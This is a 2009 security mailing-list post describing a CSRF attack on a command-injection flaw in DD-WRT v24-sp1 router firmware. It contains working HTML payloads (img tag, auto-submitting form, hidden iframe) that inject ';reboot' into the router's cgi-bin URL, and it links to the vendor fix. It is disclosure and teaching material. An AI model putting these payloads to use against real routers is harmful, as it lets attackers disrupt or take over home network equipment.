Only thing I can say You ROCK!!!!!' dude
Sent from my iPhone
On Jul 25, 2009, at 5:35 PM, Adrian Crenshaw <[email protected]>
wrote:
I heard Carlos talk about it, so I started to work on a writeup,
which I'll post to my site shortly. Carlos, thanks for the idea.
I was interested in giving a reall world example of a CSRF
attack, similar to the ones I mentioned in my OWASP Top 5 video, and
maybe use it against a piece of internal equipment that is behind a
NAT box. Then I heard about Carlos Perez write-up on using
Metasploit against a vulnerability in the DD-WRT v24-sp1 firmware. I
thought this would be a great way to demo the concept of using CSRF/
XSS against hardware behind a NAT, especially since I've done a
video on installing DD-WRT before. Some people thing it's not a big
deal since the attack request has to come from an internal source,
but they don't think about the fact that CSRF can make the attack
come from an internal source. Granted, this may not be considered a
true CSRF from the stand point that you don't have to have
authenticated against your DD-WRT v24-sp1 router, but it works much
the same way. Carlos' demo shows using Metasplot to open a shell on
the router, then do some other messing around, I'll just show how
this vulnerability could be used to reboot the router just using
html (there are far more deviant things you could do). For the most
part this attack essentially amounts to pointing the browser at http://ip-of-router/cgi-bin/;some-command
. Since the default IP for most home NAT routers is 192.168.1.1,
this is a pretty easy attack that could be pulled off against people
who browse a page that the attacker controls. The attacker would
not have to explicitly have the victim go to http://ip-of-router/cgi-bin/;some-command
to pull off the attack, there are plenty of ways to make a browser
automatically make the reques, for example:
IMG get:
<img src="http://192.168.1.1/cgi-bin/;reboot";>
Post method:
<form name="csrfform" method="post" action="http://192.168.1.1/cgi-bin/;reboot
"> <input type='hidden' name='input_from_form' value="Test of of
auto submitted form."> </form> <script> document.csrfform.submit() </
script>
IFRAME Get:
<iframe src="http://192.168.1.1/cgi-bin/;reboot"; style="width:0px;
height:0px; border: 0px"></iframe>
If you would like to test this code against your DD-WRT v24-sp1
click the link below:
DD-WRT test page, only click if you want your router to reboot
For information on the fix:
http://www.dd-wrt.com
Guess its time to patch.
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
